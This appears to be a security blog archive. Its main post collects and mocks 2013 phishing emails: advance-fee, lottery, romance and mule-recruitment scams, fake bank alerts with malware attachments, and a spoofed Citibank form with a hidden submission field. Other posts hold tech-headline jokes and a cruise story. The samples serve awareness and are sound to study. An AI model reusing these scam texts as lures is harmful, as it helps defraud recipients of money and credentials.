Thanks for all the phishing in 2013


I am thankful that I’m incapable
Of doing any good on my own
I’m so thankful that I’m incapable
Of doing any good on my own
From Thankful by Caedmon’s Call

In 2009, the first year of this blog, in honor of Thanksgiving here in the USA I posted an entry about some things I would have been thankful for in 2009. If they were even remotely true. I’m a collector and, dare I say connoisseur, of Nigerian 419 style phishing messages. Since then it’s become an annual event. So without further ado, here is a sampling of my favorites from 2013. The things I’m thankful for.

I’m thankful for old business associates from past, failed scams who saved my cut for me, despite the fact that I have no recollection of those events.

From: Barrister Benson <>
Sent: Wednesday, November 27, 2013 10:52 AM
To: Recipients

How are you with your family? I hope fine. I’ m happy to inform you about my success in getting those funds from BOA (Bank of Africa) transferred under the cooperation of a new partner from Venezuela, Presently i’m in Venezuela for investment project, meanwhile I didn’t forget your past efforts to assist me in transferring those funds despite that it failed us some how. Now contact my secretary in Benin Republic West Africa through his e -mail id ( ) ask him to send you the A.T.M  VISA CARD worths sum of ($850,000.00 US Dollars) which I kept for your compensation for all the past efforts and attempts to assist me in this transaction. so feel free and get in touch with my secretary Mr.Mike Horton  he will send the A.T.M to you.
Barrister Benson

I’m thankful for people who die with enormous amounts of money floating around in dormant accounts with no heirs.

From: Creg Badmus <>
Sent: Friday, August 2, 2013 1:39 PM
Subject: Hello Dear.

Private Banking Division
HSBC Banking Corporation.

Greetings with due respect ,

Before I introduce myself, I wish to inform that   this letter is no hoax so I urge you treat with respect and endeavour to observe utmost discretion in all matters concerning it.My name is Mr.Creg Badmus ,accountant with Private Banking Division of (World’s Local Bank) HSBC in this regional branch . I  have secured and protected transaction record of $9.8 Million US dollar discovered floating in a dormant account,without documented evidence of next of kin.The HSBC will release and transfer to account you will provide within seven working days under active partnership with my insider role.

This  is possible only if you trust and  willingly capable to work in confidence .More details shall be given to you as soon as you indicate committed interest with full data. This Proposal however is not mandatory nor in any manner compel you against your wish,I suggest you call on my private phone number but if you  feel uncomfortable ,please ignore.I need your strong assurance that you will never let me down,I guarantee that this will be executed under legitimate arrangement that will protect you from any breach of the law.

Yours Sincerely,
Mr Creg Badmus.
+60 1126394325.

I’m thankful for opportunities to take part in war profiteering for fun and profit.

Sent: Monday, September 2, 2013 7:23 PM
Subject: Look Good Here

Do you wish to become rich due to armed conflicts? It`s right time to do it. Just as the first bombs descend to Syria,
petrol prices will move up just as MONARCHY RESOURCES INC. (M O_N K) stock price! Go make $$$ on September, 3rd,
get M O_N K shares!!!

I’m thankful for the opportunity to literally remake myself into someone new.

From: Travelling Documents <>
Sent: Tuesday, March 5, 2013 2:21 PM
Subject: Passports, Driver’s Licenses, ID Cards, SSN Cards, Birth Certificates

Selling Passports, Driver’s Licenses, ID Cards and Birth Certificates
Erasing Criminal Records (Finger print and Eyes Scan)
Get your self a new identity with the highest security and discretion.
Highest Quality, Extrem Security and International Delivering
If you are interested contact us to

Best Regards
Travelling Documents

What a fortuitous combination of offers! First my old buddy Barrister Benson was kind enough to save my $850,000.00 US Dollars cut from BOA (Bank of Africa) by way of Venezuela deal that went south. Then an accountant in a branch office of Private Banking Division of (World’s Local Bank) HSBC who, no doubt got my name from Barrister Benson who was feeling bad about that BOA deal wants to cut me in on $9.8 Million US dollar – which he guarantees will be executed under legitimate arrangement that will protect me from any breach of the law although the “Hello Dear” subject is a little creepy (Creg, dude, I don’t swing that way). And then the semi-anonymous offer to invest in MONARCHY RESOURCES INC. (M O_N K) for a bit of petrol war profiteering and finally the good folks at Travelling Documents provide me a way to dash away with all that loot. Hey – they must be legit with that address, right? I mean, what could possible go wrong?

I’m thankful for companies who alert me to arrest records, financial aid notifications and credit score updates

From: |Attention| <>
Sent: Monday, June 24, 2013 2:28 PM
Subject: Arrest-Records for [your email here] {Mon, 24 Jun 2013 15:28:10 -0500}

Arrest- Records for [your email here] {Mon, 24 Jun 2013 15:28:10  -0500}

Click-to – View

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

From: 2nd-Attempt <>
Sent: Monday, June 24, 2013 2:17 PM
Subject: Financial-Aid Notification for [your email here] [Mon, 24 Jun 2013 15:17:26 -0500]

Financial – Aid Notification for [your email here] [Mon, 24 Jun 2013 15:17:26  0500]

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

From: [Second-Request] <>
Sent: Monday, June 24, 2013 2:23 PM
Subject: Score-Updates for [your email here] [Exp/TransU/Eqfx] Mon, 24 Jun 2013
15:22:47 -0500

Score- Update for [your email here] [Exp/TransU/Eqfx] Mon, 24 Jun 2013 15:22:47 -0500

View Your Documentation

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

How about that? A one-stop phishing shop for all your fake alert needs! But wait – it gets even better:

I’m thankful for (the same) company who sends me gift cards from Wal-Mart  and Wendy’s.

From: WAL-40993-01 <>
Sent: Monday, June 24, 2013 1:42 PM
Subject: Someone just sent you a Wal-Mart Card [1000USD]

Someone just sent you a Wal – Mart Card [1000USD]

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

From: WEND-773662801-1
Sent: Monday, June 24, 2013 2:19 PM
Subject: Your $50 Wendy’s Card [Mon, 24 Jun 2013 15:18:51 -0500]

Your $50 Wendy’s Card [Mon, 24 Jun 2013 15:18:51 - 0500]

pls- end- mssgs
1741 W Corona Ave
Phoenix, AZ 85041

How sweet is that? The same Phoenix, Arizona USA address for all those different companies and email addresses! In case you were wondering, the alert links all go to and the gift card links all go to Maybe it’s outsourced phishing.

I’m thankful for politicians who request permission to keep me personally informed – even though I’m way outside their district.

From: Congresswoman Cheri Bustos
Sent: Thursday, November 14, 2013 2:14 PM
Subject: Requests Your Permission

Congresswoman Cheri Bustos would like to email you periodically regarding legislative issues in
Congress that are vital to you, your family, and the 17th District of Illinois.

Receiving this information by email is a fast and efficient way to learn more during these
significant times and will provide you with timely information and important news.

Email is part of an ongoing effort to keep constituents informed and engaged. If  you would prefer
not to receive these email messages, please click here .

Best Wishes,
Congresswoman Cheri Bustos
1009 Longworth HOB
Washington, DC 20515
(202) 225- 5905

Who knew that the federal government was reduced to issuing congresswomen email addresses. Ah, such sad fiscal times are these.

I’m thankful for banks that alert me to automatic transfers with handy attachments containing nasty surprises.

From: Ricardo Duffy <>
Sent: Monday, February 25, 2013 5:52 AM
To: [Whole bunch of email addresses in the clear]
Cc: [Whole bunch of email addresses in the clear]
Subject: Automatic transfer notification
WIRE transaction is completed. $3302 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Receipt of payment is attached.

*** This is an automatically generated email, please do not reply ***

Attachment: payment -> Contains: payment receipt.exe -> Contains: Backdoor.Agent.RS malware

From: Payment notification system <> Sent: Thursday, February 21, 2013 11:44 AM
To: [Whole bunch of email addresses in the clear]
Cc: [Whole bunch of email addresses in the clear]
Subject: Automatic transfer notification
Importance: High
WIRE transaction is completed. $962 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.

*** This is an automatically generated email, please do not reply ***

Attachment: payment receipt – -> Contains: payment receipt – 884993762994.exe -> Contains: Backdoor.Androm malware

I’m thankful for banks that notify me with credit card statements and unauthorized access notices with handy forms containing surprise destinations.

From: Citi Cards <>
Sent: Friday, December 14, 2012 4:17 AM
Subject: Your Citi Credit Card Statement

Add to your address book to ensure delivery.

Your Account: Important Notification
Your Citi Credit Card statement is ready to view online

Dear customer,

Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from
your statement:

Statement Date:  December 13, 2012
Statement Balance:  -$9,676.80
Minimum Payment Due:  $355.00
Payment Due Date:  Tue, January 01, 2013

Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.

This form contains mostly fraudulent links, including many of the graphics which are primarily from;
The money links (i.e. where your money will go if you click them) are these:

From: <>
Sent: Friday, November 8, 2013 3:09 PM
Subject: Unauthorized Access Notice
Attachments: Citibank.html
Trouble reading this? Add alerts@al to your Address Book

We recently have determined that different computers have tried to log on to your Online Banking account and multiple
password failures were present before logons.

We now need to re-confirm your account information   with us.

Please download and open the document attached to this e-mail in order to verify your records. Please follow the
instructions from the document.

If this is not completed by November 10, 2013 we will be forced to suspend your account indefinitely, as it may have
been used for fraudulent purposes.

PLEASE NOTE: This is a mandatory measure. Failure to verify your records will lead to permanent service suspension.
After verifying your records you will be able to use your account as usual.

We thank you for your cooperation.
This Alert was sent according to your account settings; please do not reply to this message. Please do not contact us
directly as this issue is mainly processed by the Online System.

Attachment: payment receipt – 884993762994
This attachment is a web form that is almost completely sourced from – except for this little gem:
<input name=”submit_to” value=”,” type=”HIDDEN”>

I’m thankful for lovelorn ostensibly Russian beauties like NastyaOlga 1 and Olga 2 who are dying to meet me.

From: Anastasia <>
Sent: Monday, May 20, 2013 6:53 AM
Subject: How are you??
How is it going?? I’m Nastya. i look for a second half! I love travelling and pottery. Send me mail. Yours, Nastya!

From: Olga <>
Sent: Monday, February 11, 2013 11:39 AM
Subject: I wait for the answer
You have drawn my attention to a site of acquaintances. I hope, as I shall like you. How I to you in a photo? The truth -
pretty? :) But in a life I more nice!!!
And as I cheerful , kind, sociable and fluffy! I like to go in for sports, read books, to listen to music. I love winter and
summer. I do not love spring and slush.
If I have interested you, with pleasure I shall tell about myself more in the following letter.
I wait for the answer on

From: Olga Ivanova <>
Sent: Monday, February 4, 2013 12:00 PM
Subject: your profile to produce on me greater impression
hello webjoseph!

how are you today? What is your name?
my name is Olga, You frequently are on this site ?
I today wanted to talk to you in a chat
You have yahoo or hotmail ID? if you write to me, ok?
I shall wait from you the letter with impatience


Wow! What a hard (sic) choice to make. I mean, with a name like Nastya how can I go wrong? And she’s looking for a second half – just like the Broncos! But Olga 1 is charming in a sort of can’t-figure-out-Google-Translate kind of way as well as cheerful, kind, sociable and fluffy. Maybe she’s a cat. But apparently Olga 2 is familiar with my devastating charm and rapier wit from my profile on Oddly I can’t actually remember ever going to that site, much less setting up a profile. Oh well that’s one of the downsides to living fast and not dying young.

I’m thankful for kind people who win big lottery prizes like Allen and Violet and Dave and Angela who want to spend those millions making me rich.

From: Allen & Violet Large <>
Sent: Thursday, March 21, 2013 1:09 PM
Subject: Generous Act
Dear Sir/Madam

This is my seventh time of writing you this email. My wife and I won a Jackpot Lottery of $11.2 million in July and have
voluntarily decided to donate the sum of $1,000,000.00 USD to you as part of our own charity project to improve the lot
of 5 lucky individuals all over the world.

If you have received this email then you are one of the lucky recipients and all you have to do is get back wit h us so that
we can send your details to the payout bank.

You can verify this by visiting the web pages below. -canada -11699678

Good Luck,
Allen & Violet Large

From: Dave and Angela Dawes <>
Sent: Tuesday, August 20, 2013 10:53 AM
Subject: Happy Celebration In Advance
Dear Lucky Recipient,
You are receiving this message because my wife and I have listed you as one of our lucky selected millionaires of 1.5
million Pounds. If you are wondering how you were selected, we Utilize the service of website and search Engine That
Gives away cash prizes to help in the selection.
To Verify the genuineness of this email, watch our interview by visiting this web page so That You can be 100% sure That
You Have Not received an email hoax kindly click here -jackpot -winners-Dave-and -Angela -Dawes -to -give -millions-to -friends -and -family.html
Kindly Provide us with the below requested information, so that we can issue your draft.
Zip Code:
Happy Celebrations in Advance,
Dave-and -Angela -Dawes.

I’m thankful for all of the swell job offers like Consumer Service Critic, Mail & Package AssistantShipping/Receiving Clerk and Tour Manager all from the comfort of my home.

From: Joseph webster
Sent: Monday, April 22, 2013 2:40 AM
To: Webmaster
Subject: Consumer Service Critic
MCA -LOGISTICS INC.™ is currently drafting a LIMITED sum of VALUE CRITICS .

MCA -LOGISTICS INC® is a public survey company that uses analyticalShopping to measure the manner of service
It’s an advent to amass definitive perception about products and services.

We work with some of the largest, popular businesses in the America; from Banks to Fast Food to Petroleum,
Technology, Fashion retailers, and others more.

You will be employed to conduct an all charges paid survey and opinion task on behalf of MCA -LOGISTICS INC.
As our EVALUATIOR/ANALYTICAL clientele, you will be askedto POSE as a normal consumer while going to different places of work.
You’ll be required to discharge exact under- taking such as obtaining a merchandise or utilizing a service.
Your task will be to assess and measure the virtue of retail services rendered.
You’ll covertly evaluate their customer service while appearing as a normal customer When you’re done, you will be expected to fax your EVALUATION RECORDS (which we will provide to you) to us and then you will get paid for your opinions .
That is all there’s to it !

Peculiar expertise are not required for this task.
If you became interested in the vacancy, please reply to with the following informations:

Your name,complete mailing address,telephone and email address.

We will send you the details and the employment contract.

*****MINIMUM AGE DEMAND IS 30 YEARS************ Matured ANALYZERS ONLY, due to sedulity.

MCA -LOGISTICS INC. ©1992-2013

From: Joseph webster
Sent: Thursday, May 2, 2013 12:41 AM
To: Postmaster
Subject: Easy, fast, profitable
My name is Michael Watson, I’m Hiring Manager with Royal Mail 4 Delivery, Inc. I lately reviewed your CV with great
interest and I think that you may possess the experience needed prescribed for an occupation with our company.
You may see into this work as a part – time one or as an another earning and profit. I can mail you in more detail
description of Mail & Package Assistant per your letter of inquiry through email.
Please, do not hesitate to ask me any questions.
Thank you for the provided opportunity.

Yours faithfully,
Michael Watson
Royal Mail 4 Delivery Inc.

From: Joseph webster
Sent: Sunday, January 20, 2013 10:39 AM
To: AOL Users; Webmaster
Subject: EU deliveries is hiring
EU Deliveries is employing for the position of Shipping/Receiving Clerk.
We have many years of experience transportation individual parcels, papers and heavy cargo and have become pleased associates with USPS, UPS and FedEx.
As a Shipping/Receiving Clerk, you will be working from home. We suppose
our Shipping/Receiving Clerk to conduct the next activities:
– Suggesting our purchasers with the best level of buyer assistance service possible;
– Supervising and monitoring customer’s package sending operations; -
Keeping records of the processed pa ckage and mail Your typical daily tasks will contain:
– operating with a remote helpdesk (it helps to schedule your daily work, send message to otherteam members, download and share project documentation and other materials);
– answer client emails and calls.
Salary and remuneration:
– usd 40000 yearly (paid in parts, every month).
– Working hours: 9AM – 5PM Mon – Fri
In order to apply for this position, please email us a copy of your most recent CV. We will check the submitted information and call back you in 1 -2 business days to tell you about the status of your application.
Bruce Grossman, EU Deliveries Human Resources dpt.

From: Joseph webster
Sent: Monday, March 4, 2013 6:51 AM
To: Postmaster
Cc: Administrator
Subject: Work for those who wishes to earn money

Our company, Grand Tour tourist agency offers you a part-time position of a Tour Manager. We are one of the largest 10 travel agencies in Europe, we also work with t he United States.

At this moment, our firm is searching for interested individuals who will be able to become our reps in the USA. So this ad is only for people with the USA citizenship or a work permit. Your main role will be providing support for our clients from the United States, while they are voyaging in Europe.


– Basic skills with PC, including e-mails and word processing;
– Must be able to multi-task;
– Must be at least 19;
– High School Diploma or a college degree is a benefit.

Your pay will be usd 4000 monthly according to the work plan that should be executed. For further details, please write us at: . Upon receiving your message, we will forward you all the required
information to get acquainted with.

Yours sincerely,
Laura Pennington
Grand Tour

Wowzers! I had no idea you could be a Tour Manager or a Shipping/Receiving Clerk with no experience. From home. In your skivvies (OK TMI). But the really interesting thing about these offer letters is that they all appear to have been generated from the same faulty template. Note that the emails are always From: Joseph webster with different spoofed email addresses. Oh well, they just got several of the properties mixed up. Or maybe not, after all Michael Watson thanked me for the provided opportunity. You’re welcome, Mike. It was nothing. No really.

So there you have it – my list of stuff that I would be thankful for if they were even marginally real.

How to write headline commentary in 2013

Way back in 2009 I posted an entry about the great headline commentary in the [CodeProject] daily news. Once again those CodeProject editors have done their snarky best. And no, they have definitely not mellowed with age. The following are some of my favorites from 2013 curated and categorized for your further edification.

Because the Bible tells me so

Why the Bar Code Will Always Be the Mark of the Beast
And when he had opened the fourth seal, I heard the voice say, “Attention shoppers….”

Google patent: Throat tattoo with lie-detecting mobile microphone built-in
“And that no man might buy or sell, save he that had the mark, or the name of the beast, or the number of his name.”

How the Bible and YouTube are fueling the next frontier of password cracking
And The Lord set his password to p@ssw0rd, and there was much gnashing of teeth and rending of cloth

Python. Monty Python.

If You Can’t Do Email Validation Right…
No one expects the Spanish@Inquisit.ion.

The hollow triangular numbers are divisible by three
Then, shalt thou count to three. No more. No less. Three shalt be the number thou shalt count.

Obligatory Star Wars references

Samsung Demos a Tablet Controlled by Your Brain
I felt a great disturbance in the Force, as if several emails had just arrived.

(Open)VMS – the end of an era
Join me, Windows NT, and together we can rule the galaxy as father and son.

Obligatory Star Trek references

The Bounded Gaps Between Primes Theorem has been proved
Proving the prime directive: Kirk + Green alien women do not appear in sequential Star Trek episodes.

Surfing the memes

Protect Yourself From SQL Injection
Those who cannot remember the past are condemned to DELETE FROM Employees

SimCity mod demonstrates the possibility of some form of indefinite offline play
Sharks with frikin lasers attached to their heads add-on can’t be far behind.

You don’t need every customer
1 star. Unfunny subhead. Needs more cowbell.

They’re killing the PC
Then that means all those computers in the office… They must be the undead!

Binary Integer Programming With Python
Step 2: make sure optimization errors do not accidentally cause zombie apocalypse.

What the meaning of is is
I did not have NULL relations with that variable.

Google’s Quantum A.I. Lab adds quantum physics to Minecraft
Use it to build a cat

Great news! Engineers aren’t psychopaths (but CEOs are)
“I’m not a psychopath, I’m a high-functioning sociopath. Do your research.”

Enough LOLCATS already

The One Tip That Will Help You Learn To Code 10x Faster
Curiosity killed the cat. So did looking at animated GIFs of cats. Only more slowly.

More data storage? Here’s how to fit 1,000 terabytes on a DVD
Removing cat photos and animated GIFs reduces the problem significantly.

The year of the Linux … something

9 Things That Are Never Admitted About Open Source
One thing we can agree on: “next year” is always the year of the Linux desktop.

Ubuntu for Phones – Analysis for Potential and Visual Breakdown
Oh, great. 2013 will be the year of the Linux desktop *and* phone.

How to: Steam on Linux (Debian 7.0)
The year of the Linux GAMING desktop!

Why Is The International Space Station Switching From Windows To GNU/Linux?
This is finally the year of the Linux space station.

Data in the driver’s seat
This could be the year of Linux on the dashboard.

Dear Linux, I’m leaving you — for Windows 8
I guess last year was the year of the Linux desktop… and we missed it.

Life in tech world

Brace styles and JavaScript
Pro tip: when someone pays you to write code for them, use whatever style they prefer.

First Impressions: the TECK Ergonomic Mechanical Keyboard
Ergonomics is Latin for “You won’t get any work done for weeks.”

Kids, don’t believe the startup hype: Why you should join a big company first
You’ve got to ask yourself one question: Do I like ramen?

Universities fail to offer essential programming skills like Cobol
There’s also worryingly low enrollment in Conversational Latin.

On false dichotomies and diversity (in tech conferences)
In an industry where 27–29% are female, if you manage to get a speaker line-up with 0% female speakers, you have a bias.

How to work with software engineers
Free donuts works for me. What’s your trick?

The Tech Industry’s Darkest Secret: It’s All About Age
Youth and enthusiasm is cheaper than age and experience. In the short run.

Study: Most CEOs lack vision, leadership on new computer tech
In related news: IT workers shocked (that a study got something right)

The Machine-Readable Workforce
Thank you for applying. According to our algorithms, you’re fired.

6 predictions for the future of tech from Google exec Eric Schmidt
Bonus prediction: an important update will begin just when you need to do something else.

Microsoft’s revamped Kinect for Xbox One will also come to Windows next year
The new Ctrl+Alt+Delete: Wave, Swipe, Raise the roof, Jump to the left, Stick it, Glide

Live in a dev world

Announcing Topaz: A New Ruby
A Ruby clone, written in Python, based on a Ruby port… um, OK.

jQuery made me become a programmer
Think of jQuery as a gateway “language”… pretty soon they’ll be coding the hard stuff.

The Definitive Reference To Why Maybe Is Better Than Null
Schrodinger’s Type: Maybe it’s there. Maybe it’s not.

Like a good scotch, developers get better with age
Even better? A developer drinking scotch

Almost Flat Design
Next up: abstract expressionist interfaces. Click wherever you like. It won’t mean anything.

Frame of Reference — The real issues at the heart of modern interface design
The skeuomorphic of today is the hieroglyphic of tomorrow.

What makes Java developers more productive?
Two quarts of French Roast, and a #18 needle

9 Fallacies of Java Performance
“Sophisticated platform” typically means “I have no idea how it works.”

What’s in a name?

What comes next after Windows 8.1?
Windows 2014 RT CE RTFM IX, Ultraviolet Edition

Nokia shareholders approve Microsoft deal
One step closer to “Windows Phone 9 360, Powered by Nokia Lumia Technology”

Close enough for government work

Fork the government (before they fork you)

Security hole in exposed user email addresses
/face palm Someone get little Bobby Drop Table to log in website ‘didn’t have a chance in hell’
Too big to succeed (500 million lines of code?!)

Nations Buying as Hackers Sell Flaws in Computer Code
First we get Moose and Squirrel, then conquer World.

Exciting stuff someone might want

Does Anyone Actually Want a “Facebook Phone”?
I’m holding out for a Twitter pager.

Facebook’s “Phone” Is Another Triumph of Mediocrity
The genius of the Facebook phone is that the company made a phone without making a phone at all.

Microsoft may give smartwatches another try
Even a stopped clock is right twice a day… except when it’s digital.

Almost every major consumer electronics manufacturer is now working on a smart watch
In other news, hardly anyone actually wants a smart watch.

New wave Wi-Fi: Wireless underwater Internet in the works
Good news for all twittering SCUBA divers

Mozilla Appmaker
Apps made by apps that allow anyone to build apps should be used by no one

IBM has a new protocol (and a box) for the internet of things
An Arduino can do this, but no one was ever fired for buying IBM.

Security is in the eye of the beholder

Should websites be required to publicly disclose their password storage strategy?
“Robust” means storing them in plain text behind a website riddled with XSS and SQL injection.

Obscurity: A Better Way to Think About Your Data Than ‘Privacy’
It’s difficult to protect your privacy from your own oversharing

How Secure Are Windows Store Apps?
I’m skeptical of the inherent security of a security model that requires constant updates.

Microsoft account to get two-factor authentication soon
Your password must contain a capital letter, a number, a haiku, a toad’s foot…

Eric Schmidt calls Android ‘more secure than the iPhone’
And by ‘secure’, he means, ‘makes me more money”

Just between you and me. And the NSA.

Confirmed: The NSA is Spying on Millions of Americans
Dear NSA, please tell me which phone/data plan best suits my usage patterns

Microsoft Finally Offers To Pay Hackers For Security Bugs With $100,000 Bounty
As a bonus, you’ll also be included in an exclusive list of hackers watched by the NSA.

Google’s Schmidt: NSA spying on data centers Is ‘outrageous’
Yeah, everyone knows they should only be spying on cell phones (and browsers, and …)

Apple releases report on government requests for user data, ‘strongly’ opposes US gag order
“If you are on a list targeted by the CIA, you really have nothing to worry about. If however, you have a name similar to somebody on a list targeted by the CIA, then you are dead.”

Tweaking the corporate giants

How to check if your Adobe account was compromised
Or use this handy guide, “Have you ever signed into the Adobe site?”

Core Rot at Apple
No mystical reality distortion field controls my destiny. It’s all a lot of simple tricks and nonsense

Defective Dell Latitude 6430u notebooks ‘smell of cat urine’
It’s the new corporate scent, now that they’ve gone private

In Nook, Microsoft sees a chance to compete against Amazon and Apple
A nook can’t read so a nook can’t cook, SO… a Surface with Nook might be a good hook.

Plan your digital afterlife with Inactive Account Manager
Welcome to the Past Lives Pavilion…. brought to you by “Google Death.”

A close look at how Oracle installs deceptive software with Java updates
We’ve secretly replaced the fine Java they usually serve with insecure browser toolbars. Let’s see if anyone notices…

Oracle database costs are driving firms to Postgres, says EnterpriseDB
And in related news, the CEO of Oracle was seen sailing his 88m yacht to his island (Lanai, most of it anyway)

My Christmas Vacation from Hell, a Cautionary Tale.

To paraphrase Joe Friday of Dragnet fame, here are just the facts, ma’am: Since 2012 marked our 30th anniversary, my wife and I booked a Christmas Cruise. This being our first cruise, we were lucky to be accompanied by some family members, several of which are veteran cruisers. The salient fact about this cruise is that it embarked from Baltimore, MD USA and included a stop in Port Canaveral, FL USA before sailing on to the Bahamas. As Charles Dickens writes in A Christmas Carol, this must be distinctly understood, or nothing wonderful can come of the story I am going to relate.

Shortly after we sailed I started feeling ill. By dinner I was very sick, but everyone including the ship’s doctor assured me that it was just sea-sickness and that a nice lie down in the stateroom would have me ready to eat and drink my way to cruise nirvana soon. By the time the ship docked in Port Canaveral it was apparent that my affliction was not motion sickness but something more serious and probably contagious. So at this point my wife and I decided to leave the cruise since luckily we were still in the USA. Turns out that was not so lucky after all.

The guest services people on the ship, while quite solicitous and sympathetic, were nonetheless flummoxed by this situation. First they told us that we were not allowed to disembark until we reached Nassau, in the Bahamas. When pressed further they decided that while we could technically disembark in Florida, there would be a $300 per person fee to do so. We decided that it would be worth the $600 to avoid sailing on and then risking having to fly home to Colorado from Nassau. So we made the appropriate arrangements with a local hotel and rescheduled our flights accordingly. When we arrived back at the guest services desk, luggage in hand, the attendant informed us that they just needed to contact Customs and Border Protection (CBP) so we could be escorted off the ship. A few moments later, the seriously flustered crew member returned with news that CBP would not be able to send anyone until long after the ship was scheduled to sail for the Bahamas. At this point we got a bit testy and pointed out that we could simply walk off the ship, it being docked and we being American citizens to which the amazingly understanding, but frustrated guest services guy replied while that was a possibility they would be required to inform local authorities that we had disembarked and we would then in essence be fugitives, albeit very easy to find fugitives.

So feeling defeated, we decided that the best course of action would be to make another visit to the ship’s doctor and stick it out until we reached Nassau and decide then what course of action to take. The doctor concurred with our amateur diagnosis of some kind of virus infection, medicated me heavily and quarantined me to our stateroom for 24 hours which would be about the time we would arrive in Nassau. Fortunately the treatment was effective and I was more or less healthy when we reached Nassau and decided to continue the cruise. Unfortunately between the hotel we booked on short notice and never used and the changes in airline flights we made, the cost was substantial.

So how does a snarky security blogger having a bad vacation affect you and how is this a “cautionary tale”? I’m glad you asked.

The real story involves antiquated laws, security theater and the nature of the passenger maritime industry. But I’m getting ahead of myself.

The story begins in 1886 with a bit of legislation intended to protect the then in it’s infancy American passenger vessel industry, called the Passenger Vessel Services Act of 1886.

The Passenger Vessel Services Act of 1886 (sometimes abbreviated to PVSA, Passenger Services Act, or PSA) is a piece of United States legislation which came into force in 1886 relating to cabotage. Essentially, it says:

No foreign vessels shall transport passengers between ports or places in the United States, either directly or by way of a foreign port, under a penalty of $200 (now $300) for each passenger so transported and landed.

This was further bolstered by the Merchant Marine Act of 1920, better known as the “Jones Act”.

The Merchant Marine Act of 1920 (P.L. 66-261) is a United States federal statute that regulates maritime commerce in U.S. waters and between U.S. ports. Section 27, better known as the Jones Act, deals with cabotage (i.e., coastal shipping) and requires that all goods transported by water between U.S. ports be carried in U.S.-flag ships, constructed in the United States, owned by U.S. citizens, and crewed by U.S. citizens and U.S. permanent residents. The purpose of the law is to support the U.S. maritime industry.

So putting this together we get the following (presumably unintended) consequences.

Any vessel subject to the Merchant Marine Act of 1920 counts as a U.S. vessel. Under the Passenger Vessel Services Act of 1886 (46 U.S.C. § 55103), foreign-flagged vessels cannot transport passengers directly between U.S. ports. The handful of U.S.-flagged cruise ships in operation are registered in the U.S. to permit cruises between the Hawaiian Islands, or from the continental U.S. to Hawaii. The Passenger Vessel Services Act, however, does not prohibit foreign-flagged ships departing from and returning to the same U.S. port or foreign-flagged ships departing from a U.S. port, visiting a foreign port, and then continuing to a second U.S. port. However, in order to embark in a U.S. port and disembark in a second U.S. port, the vessel must visit a distant foreign port outside of North America (Central America, Bermuda. the Bahamas, and all of the Caribbean except Aruba, Bonaire, and Curaçao, count as part of North America).

In accordance with this law, Cruise lines that operate foreign-flagged vessels are fined $300 for each passenger who boarded such a vessel in one U.S. port and left the vessel at another port.

There are legal exceptions in the case of medical emergency, which in spite of how I felt at the time, my 48-hour malady could hardly be considered such. So the bottom line is that the cruise line was prohibited by US law from allowing us to disembark at an intermediate US port.

But wait! This gets better. Since 911 the Customs and Border Protection (CBP), now a part of the Department of Homeland Security (DHS), has had a strict policy that no one embarks to or disembarks from a foreign-flag vessel in a US port without going through CBP (often referred to as “Customs”). And this is where it gets really interesting. Turns out there is no CBP office in Port Canaveral since no foreign-flag vessels embark or disembark passengers there and the nearest CBP office is in Orlando which is 55 miles away. So it’s not too surprising that the CBP folks were not ready to lend assistance immediately. So the bottom line is this: there was no legal way for the cruise line to allow us to disembark at Port Canaveral except if we were taken directly to a hospital or in police custody.

So why didn’t the ship’s guest services crew just tell us this up front? Here’s where the final bit of that foreshadowing of doom comes in: the nature of the passenger maritime industry. You see, the typical crew member on a cruise ship is not American (given that as far as I can find out there is exactly one US-flag cruise ship in operation) so they can hardly be expected to be familiar with US maritime law. Also crew members are not permanently assigned to a ship and ships are not dedicated to a single cruise route. Since very few cruises that embark from US ports have an intermediate stop in another US port before heading out into international waters thereby being subject to the Jones Act, it’s hardly surprising that no one on the guest services crew during the holiday season had ever heard anything about either the Jones Act or CBP policy. So you can hardly fault the crew members for not having good information.

Finally there’s yet another bit that didn’t figure in to this tale that would have had we decided to stop cruising and disembark in the Bahamas per the suggestion of the crew. Since 911 DHS has aggressively discouraged airlines from booking short notice one-way flights into the US. Airlines will not actually refuse to do so, but it will cost a lot. In fact they will suggest that you buy a round-trip ticket which will cost less, although still expensive, and just forget the return trip. In either case this will pretty much guarantee a strip search and several hours of intimate conversation with TSA officials once you get back into the US.

So what should you take from this cautionary tale? Here’s the list:

  1. If you take a cruise from a US port to anywhere outside the US, be aware that if you get sick or have an emergency that cuts short your cruise it will be a very expensive proposition.
  2. Do not assume that crew members on the cruise ship have any idea how to handle your emergency situation with respect to getting you off of the ship.
  3. If you are forced to cut short your cruise be aware that the cruise line is very limited in what they can do to help you as they too are victims of antique protectionist law and modern security theater.
  4. Since the cruise line is forced into an untenable situation there are no guarantees regarding what they can or will be responsible for. You are on your own to figure this out and know what should happen next.

Fortunately this story does have a happy ending. My vacation wasn’t totally ruined. I got to visit Nassau and bask in the warm Caribbean sun on Coco Cay, so I definitely will be returning to the Bahamas in the future. The cruise line, Royal Caribbean, really made things right. Not only waiving all medical fees and refunding part of the cruise fee for the time I was quarantined they refunded all of the extra expenses incurred with the failed attempt to leave the ship. So kudos to Royal Caribbean (no they didn’t spiff me to write this – they just did the right thing). Since I have no other experience, I have no idea what other cruise lines might do in such a situation but I can definitely recommend Royal Caribbean. Only next time I think I’ll take a cruise not subject to the Jones Law / CBP / DHS perfect storm of cruise hell.

Security For All is fours years old (and then some)

Happy Birthday, Happy Birthday, Happy Happy Birthday To You!
I want to do something special for you,
It’s your birthday, and you’re special too.
So I brought some guabs from the outter guab zoo.
They honk (honk) and squak (squak) and sing just for you…
Happy Birthday, Happy Birthday, Happy Happy Birthday To You!
Open your eyes, here’s a present.
More crazy creatures; don’t worry they’re pleasant.
They’re upside down weets on inside out swings,
They do things backwords, and backwords they sing…
Yppah Yadhtrib, Yppah Yadhtrib, Yppah Yppah Yadhtrib Ot Ouy!
From Happy Birthday by Disney

